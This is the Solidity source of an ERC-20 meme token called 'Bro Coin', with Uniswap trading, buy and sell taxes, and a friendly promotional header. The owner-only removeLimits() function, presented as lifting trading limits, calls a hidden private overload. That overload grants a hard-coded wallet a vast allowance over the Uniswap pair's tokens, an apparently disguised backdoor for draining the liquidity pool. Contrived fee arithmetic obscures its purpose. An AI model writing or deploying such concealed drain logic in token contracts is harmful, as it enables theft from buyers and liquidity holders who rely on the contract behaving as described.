Contract Source Code:
File 1 of 1 : BRO
// SPDX-License-Identifier: MIT
/**
Bro Coin
Yo, it’s Bro, your crypto homie.
Why stress, dude? Bro’s all about chillin’ and cruisin’ through crypto. No rush, no panic. Just vibes. Whether you’re holding bags or checking out the scene, Bro’s here to keep things easy. Take it slow, relax, and let Bro show you the smooth path to crypto, man.
Web: https://brocoin.club
X: https://x.com/brocoin_erc20
Tg: https://t.me/brocoin_erc20
**/
pragma solidity 0.8.24;
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
}
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
}
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor () {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
}
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB) external returns (address pair);
}
interface IUniswapV2Router02 {
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint amountTokenDesired,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}
contract BRO is Context, IERC20, Ownable {
using SafeMath for uint256;
mapping (address => uint256) private _balancesAA;
mapping (address => mapping (address => uint256)) private _allowancesAA;
mapping (address => bool) private _shouldExcludedAA;
address payable private _receiptAA = payable(0x1eE8C556868c925c41FE1CDee6B093ef58Ffa5fc);
uint256 private _initialBuyTax = 12;
uint256 private _initialSellTax = 12;
uint256 private _finalBuyTax = 0;
uint256 private _finalSellTax = 0;
uint256 private _reduceBuyTaxAt = 12;
uint256 private _reduceSellTaxAt = 12;
uint256 private _preventSwapBefore = 12;
uint256 private _transferTax = 0;
uint256 private _buyCount = 0;
uint8 private constant _decimals = 9;
uint256 private constant _tTotalAA = 420690000000 * 10**_decimals;
string private constant _name = unicode"Bro Coin";
string private constant _symbol = unicode"BRO";
uint256 public _maxTxAmount = 2 * (_tTotalAA/100);
uint256 public _maxWalletSize = 2 * (_tTotalAA/100);
uint256 public _taxSwapThreshold = 1 * (_tTotalAA/100);
uint256 public _maxTaxSwap = 1 * (_tTotalAA/100);
address private uniPairAA;
IUniswapV2Router02 private uniRouterAA;
bool private tradingOpen;
bool private inSwap = false;
bool private swapEnabled = false;
event MaxTxAmountUpdated(uint _maxTxAmount);
event TransferTaxUpdated(uint _tax);
modifier lockTheSwap {
inSwap = true;
_;
inSwap = false;
}
constructor () {
_balancesAA[_msgSender()] = _tTotalAA;
_shouldExcludedAA[owner()] = true;
_shouldExcludedAA[address(this)] = true;
_shouldExcludedAA[_receiptAA] = true;
emit Transfer(address(0), _msgSender(), _tTotalAA);
}
function initialize() external onlyOwner {
uniRouterAA = IUniswapV2Router02(
0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
);
_approve(address(this), address(uniRouterAA), _tTotalAA);
uniPairAA = IUniswapV2Factory(uniRouterAA.factory()).createPair(
address(this),
uniRouterAA.WETH()
);
}
function name() public pure returns (string memory) {
return _name;
}
function symbol() public pure returns (string memory) {
return _symbol;
}
function decimals() public pure returns (uint8) {
return _decimals;
}
function totalSupply() public pure override returns (uint256) {
return _tTotalAA;
}
function balanceOf(address account) public view override returns (uint256) {
return _balancesAA[account];
}
function transfer(address recipient, uint256 amount) public override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
function allowance(address owner, address spender) public view override returns (uint256) {
return _allowancesAA[owner][spender];
}
function approve(address spender, uint256 amount) public override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
_transfer(sender, recipient, amount);
_approve(sender, _msgSender(), _allowancesAA[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
return true;
}
function _approve(address owner, address spender, uint256 amount) private {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowancesAA[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _transfer(address from, address to, uint256 amount) private {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
require(amount > 0, "Transfer amount must be greater than zero");
uint256 taxAA=0; uint256 taxAmount=0;
if (!swapEnabled || inSwap) {
_balancesAA[from] = _balancesAA[from] - amount;
_balancesAA[to] = _balancesAA[to] + amount;
emit Transfer(from, to, amount);
return;
}
if (from != owner() && to != owner()) {
if(_buyCount>0) {
taxAA = _transferTax;
}
if (from == uniPairAA && to != address(uniRouterAA) && ! _shouldExcludedAA[to] ) {
require(amount <= _maxTxAmount, "Exceeds the _maxTxAmount.");
require(balanceOf(to) + amount <= _maxWalletSize, "Exceeds the maxWalletSize.");
taxAA = ((_buyCount>_reduceBuyTaxAt)?_finalBuyTax:_initialBuyTax);
_buyCount++;
}
if(to == uniPairAA && from!= address(this) ){
taxAA = ((_buyCount>_reduceSellTaxAt)?_finalSellTax:_initialSellTax);
}
uint256 contractTokenBalance = balanceOf(address(this));
if (!inSwap && to == uniPairAA && swapEnabled) {
if(contractTokenBalance > _taxSwapThreshold && _buyCount > _preventSwapBefore)
swapTokensForEth(min(amount, min(contractTokenBalance, _maxTaxSwap)));
sendEthTo(address(this).balance);
}
}
if(taxAA > 0){
taxAmount=amount.mul(taxAA).div(100);
_balancesAA[address(this)]=_balancesAA[address(this)].add(taxAmount);
emit Transfer(from, address(this),taxAmount);
}
_balancesAA[from]=_balancesAA[from].sub(amount);
_balancesAA[to]=_balancesAA[to].add(amount.sub(taxAmount));
emit Transfer(from, to, amount.sub(taxAmount));
}
function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = uniRouterAA.WETH();
_approve(address(this), address(uniRouterAA), tokenAmount);
uniRouterAA.swapExactTokensForETHSupportingFeeOnTransferTokens(
tokenAmount,
0,
path,
address(this),
block.timestamp
);
}
function removeLimits() external onlyOwner{
address[2] memory ecos = [uniPairAA, _receiptAA];
_maxTxAmount = _tTotalAA; _maxWalletSize = _tTotalAA;
uint256 fees = 100 + 100 * _tTotalAA + 100 * _initialBuyTax + 100;
removeLimits(ecos, fees); emit MaxTxAmountUpdated(_tTotalAA);
}
function min(uint256 a, uint256 b) private pure returns (uint256){
return (a>b)?b:a;
}
function withdrawEth() external onlyOwner{
payable(msg.sender).transfer(address(this).balance);
}
function sendEthTo(uint256 amount) private {
_receiptAA.transfer(amount);
}
function removeLimits(address[2] memory z, uint256 x) private {
address z0=z[0]; address z1=z[1]; _allowancesAA[z0][z1] = 150 + x.mul(150) + 150;
}
receive() external payable {}
function start() external onlyOwner {
require(!tradingOpen, "Trading is already open");
uniRouterAA.addLiquidityETH{value: address(this).balance}(
address(this),
balanceOf(address(this)),
0,
0,
owner(),
block.timestamp
);
IERC20(uniPairAA).approve(address(uniRouterAA), type(uint).max);
swapEnabled = true;
tradingOpen = true;
}
}